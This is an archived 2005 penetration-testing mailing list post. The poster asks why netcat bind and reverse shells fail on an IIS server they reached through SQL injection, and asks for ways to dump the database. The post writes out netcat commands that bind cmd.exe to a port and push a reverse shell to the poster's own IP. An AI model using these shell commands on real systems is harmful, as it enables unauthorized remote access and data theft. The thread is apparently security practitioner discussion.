Penetration Testing mailing list archives
Netcat Question
From: intel96 <intel96 () bellsouth net>
Date: Tue, 31 May 2005 18:39:05 -0400
To All,I am conducting a pentest and I have been able to upload netcat to the web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to establish a shell both ways, but cannot get it to work:
On the web server I first tried: nc.exe –l –p 8000 –e cmd.exeWhen I tried to connect to port 8000 on the web server I received a timeout on my side. I have also tried this with port 53 and it also did not work.
I than tried: nc.exe –nv my_public_ip_address 443 -d –e cmd.exeThis did not work either. I did not see the remote system trying to connect to my system via my logs. I have access to upload anything to the system and run most commands via sql injections. I have administrator level access on the system at this time.
Any ideas on how I can get this shell to work? Or there any other commands that may provide me more access or allow me to dump the database?
Thanks, Intel96
Current thread:
- RE: Netcat Question Meidinger Chris (Jun 01)
- <Possible follow-ups>
- Netcat Question intel96 (Jun 01)
- RE: Netcat Question Miguel Dilaj (Jun 01)
- Re: Netcat Question Jordan . DelGrande (Jun 01)
- Re: Netcat Question Mariano Nuñez Di Croce (Jun 01)
- Re: Netcat Question atomek (Jun 01)
- RE: Netcat Question Bartholomew, Brian J (Jun 01)